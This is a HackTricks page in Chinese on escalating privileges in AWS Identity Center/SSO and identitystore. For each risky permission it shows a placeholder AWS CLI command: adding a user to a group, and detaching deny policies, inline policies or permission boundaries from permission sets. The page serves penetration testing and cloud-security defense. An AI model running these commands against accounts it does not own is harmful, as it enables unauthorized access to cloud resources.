AWS - SSO & identitystore Privesc

支持HackTricks

AWS Identity Center / AWS SSO

有关AWS Identity Center / AWS SSO的更多信息,请查看:

AWS - IAM, Identity Center & SSO Enum

请注意,默认情况下,只有具有管理账户权限的用户才能访问和控制IAM Identity Center。 其他账户的用户只有在该账户是委派管理员时才能允许访问。 查看文档以获取更多信息。

重置密码

在这种情况下提升权限的一种简单方法是拥有一个允许重置用户密码的权限。不幸的是,只能发送电子邮件给用户以重置密码,因此您需要访问用户的电子邮件。

identitystore:CreateGroupMembership

通过此权限,可以将用户放入组中,以便他将继承组具有的所有权限。

aws identitystore create-group-membership --identity-store-id <tore-id> --group-id <group-id> --member-id UserId=<user-id>

然而,您需要访问令牌,我不确定如何获取(待办事项)。

sso:DetachManagedPolicyFromPermissionSet

拥有此权限的攻击者可以从指定的权限集中移除 AWS 托管策略的关联。通过**分离托管策略(拒绝策略)**可能授予更多权限。

aws sso-admin detach-managed-policy-from-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN> --managed-policy-arn <ManagedPolicyARN>

sso:DetachCustomerManagedPolicyReferenceFromPermissionSet

拥有此权限的攻击者可以从指定的权限集中移除与客户管理策略的关联。通过**分离托管策略(拒绝策略)**可能会授予更多特权。

aws sso-admin detach-customer-managed-policy-reference-from-permission-set --instance-arn <value> --permission-set-arn <value> --customer-managed-policy-reference <value>

sso:DeleteInlinePolicyFromPermissionSet

具有此权限的攻击者可以从权限集中的内联策略中移除权限。通过分离内联策略(拒绝策略),有可能授予更多权限。

aws sso-admin delete-inline-policy-from-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN>

sso:DeletePermissionBoundaryFromPermissionSet

具有此权限的攻击者可以从权限集中移除权限边界。通过移除从权限边界给出的权限集上的限制,有可能授予更多权限

aws sso-admin   delete-permissions-boundary-from-permission-set --instance-arn <value> --permission-set-arn <value>
支持HackTricks

Last updated